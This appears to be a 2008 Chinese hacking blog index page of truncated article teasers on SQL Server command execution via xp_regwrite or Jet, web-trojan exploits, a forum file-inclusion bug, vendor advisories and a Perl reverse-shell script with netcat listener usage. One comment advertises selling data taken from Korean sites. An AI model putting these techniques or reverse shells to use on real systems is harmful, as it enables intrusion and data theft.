低调de悟空的博客
百度首页 | 百度空间
 
网站
 
 
 
 
 
 
 
 
 
 
 
     
 
 
推荐文章
 
 
 
 
     
 
文章列表
 
2008-05-12 08:26

删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
主要是由于Jet允许调用VBA的shell()函数,该函数允许你执行shell命令

利用jet执行shell命令比想办法恢复xp_cmdshell来得经济实惠,不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
解决办法:
如果不需要RDS支持,请删除x:\Program Files\Common Files\System\M

 
2008-05-12 08:24
作者:余弦
来源:0×37 Security

其实想想就会知道,网马的exp总会有暴露的时刻,也就是说,我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段,我们可以隐藏网马exp的地址,但是却无法保证这个exp不暴露出来,exp终究要在你的浏览器上执行恶意行为。
比如下面code可以隐藏网马exp的地址,却不得不暴露出这个exp:

http://127.0.0.1/s_trojan/index.html的代码:

<sc
 
2008-05-09 15:46
来源:IT168

很多时候在企业网络安全,特别是服务器上数据库安全防范方面需要特别注意,弥补所有漏洞,减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”,那么什么是“跨站入侵”,他是如何产生如何被利用的呢?今天就请各位IT168读者跟随笔者一起从“跨站入侵”实际攻防战了解他的来龙去脉。

一,什么是“跨站入侵”:

  
 
2008-05-08 09:32

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接

 
2008-05-08 09:29

来源:

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
Overview:
Yahoo!助手(原3721网络助手),是一个IE下的BHO (Browser Helper Object).

Yahoo!助手有许多功能,例如IE设置修

 
2008-05-08 09:28

作者:疯狗
以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find “36897″
TCP    127.0.0.1:36897        0.0.0.0:0              LISTENING

绑定的本地IP啊?!那就说明这个是不可

 
2008-05-08 09:27

作者:小杰

都是使用nc监听!
反向连接代码:

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type ‘exit‘ to exit or press En
 
2008-05-08 09:12

方法一

使用phpmyadmin,这是最简单的了,修改mysql库的user表,不过别忘了使用PASSWORD函数。

方法二

使用mysqladmin,这是前面声明的一个特例。

mysqladmin -u root -p password mypasswd
 
2008-05-08 09:09
全站文章系统采用FSO静态生成的HTML文件来显示,这样做的好处一来可以减轻服务器负担,提高访问速度。二是阻止SQL注入式的攻击...

  文章系统原理:

  全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。

  攻击方法:查看源文件,里面是否有通过JS来调用页面。

  如调用 <script language="javascript" src="count.asp?id=1552"></script>

 
2008-05-08 08:53

PS:很有必要安装一个.

介绍:

你的网站是否经常遭到非法攻击?是否因盗链或P2P多线程下载而耗尽带宽资源?是否没钱购买网上的此类软件?那么请使用Safe3 IIS FireWall吧!Safe3 IIS FireWall是一款完全免费的IIS防护软件,内置如下功能,主要防止黑客攻击和多线程下载占用带宽。



软件功能:

防止SQL注入式攻击;
防止溢出代码攻击;
防止特殊字符构成的URL利用;
防止XSS跨站提交;
防止网站文件盗链;
防止构造危险的Cookie;
防止迅雷等p2p多线程下

 
     
 
 
背景音乐
 
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
     
 
最新评论
   

挂你0老0母0屁本事没一个.天天搞这些路
 

谢谢
 

五一节 要快乐啊
 

vbs 好东西就是多
 

恩,谢谢!
 
     
 
留言板
 

路过。..
 

路过
顺便告诉下,你的QQ是不是填错了
QQ上根本没有这人!
 

互相学习,客气什么撒。
 

偶是小雪
以后多多指教
文章都在新博客
有兴趣看下啊
 

同行 哈哈
 

可以雇你帮我查个IP地址吗
 

(*^__^*) 嘻嘻……
 

组建 网络渗透 工作室` 收韩站数据`1手单` QQ 7878 3663
 

呵呵 难为你了一次写了这么多。我那有一篇《WK's渗透守则》这位仁兄看了没有没有去看...
 

提醒你一句
别把公安想得很弱,别认为自己看了些网上文章就认为真的能随便来去,那都...
 
     
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu